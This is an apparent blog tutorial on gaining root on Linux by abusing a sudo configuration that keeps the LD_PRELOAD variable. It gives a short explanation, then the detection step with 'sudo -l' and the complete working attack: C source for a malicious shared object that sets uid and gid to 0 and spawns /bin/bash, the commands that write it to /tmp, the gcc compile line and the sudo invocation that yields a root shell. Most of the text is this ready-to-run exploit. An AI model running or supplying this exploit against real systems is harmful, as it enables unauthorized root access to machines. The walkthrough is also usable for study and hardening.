Sudo (LD_PRELOAD) (Linux Privilege Escalation)

Privilege Escalation from an LD_PRELOAD environment variable. Before exploit let’s read something about LD_PRELOAD environment Variable.

Index

  1. What is LD_PRELOAD?
  2. Detection.
  3. Exploit LD_PRELOAD.

What is LD_PRELOAD?

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

To avoid this mechanism being using as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.

For More click here.

Detection

Fire up terminal and type:

user@debian:~$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

If output something like this, congratulations target is vulnerable and you can exploit LD_PRELOAD issue to get root privilege shell and to acomplished privilege escalation you also need some sudo permission  binary which use LD_PRELOAD envr.

some Sudo command which can be done current user .

Program File :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Exploit LD_PRELOAD.

open terminal and go to any Writable Directory for dropping shell.

writtable directory like 

  • /tmp
  • /var/tmp
  • /dev/shm

in our case we using /tmp directory.

Drop a evil.c using any text editor, here we used cat for droping shell.

user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF

lest Compile and make object file.

gcc -fPIC -shared -o evil.so evil.c -nostartfiles

Time to final step 3:)

sudo LD_PRELOAD=evil.so <COMMAND>

here <COMMAND> mean which command have u allowed to do with sudo.

you can use any sudo command which allowed to current user.

BooOO00m You got Root SHELL..

Thanks For Reading Comment below your Feedback and suggestion.

 

 

> tail -n 2 /var/log/user_comments.log

> ./init_connection.sh --post-comment

Your email address will not be published. Required fields are marked *